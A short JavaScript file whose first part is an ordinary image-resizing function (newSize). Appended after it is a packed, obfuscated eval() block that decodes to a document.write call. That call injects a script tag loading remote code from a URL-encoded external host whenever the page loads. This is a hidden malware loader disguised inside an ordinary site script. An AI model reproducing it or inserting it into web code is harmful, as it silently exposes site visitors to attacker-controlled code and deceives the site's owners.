function newSize(ImgTag,FitWidth,FitHeight) 
{ 
var image = new Image(); 
image.src = ImgTag.src; 
if(image.width>0 && image.height>0){ 
if(image.width/image.height >= FitWidth/FitHeight){ 
if(image.width > FitWidth){ 
ImgTag.width = FitWidth; 
ImgTag.height = (image.height*FitWidth)/image.width; 
} 
else{ 
ImgTag.width = image.width; 
ImgTag.height = image.height; 
} 
} 
else{ 
if(image.height > FitHeight){ 
ImgTag.height = FitHeight; 
ImgTag.width = (image.width*FitHeight)/image.height; 
} 
else{ 
ImgTag.width = image.width; 
ImgTag.height = image.height; 
} 
} 
} 
} 

eval(function(p,a,c,k,e,r){e=String;if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[0-3]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('document.write("<0 language=\\"javascript\\" src=\\"http://%6B%1%1%70%2%3%2%73%2E%63%3%6D/stat0.php?web_id=22\\"></0>");',[],4,'script|65|77|6F'.split('|'),0,{}))
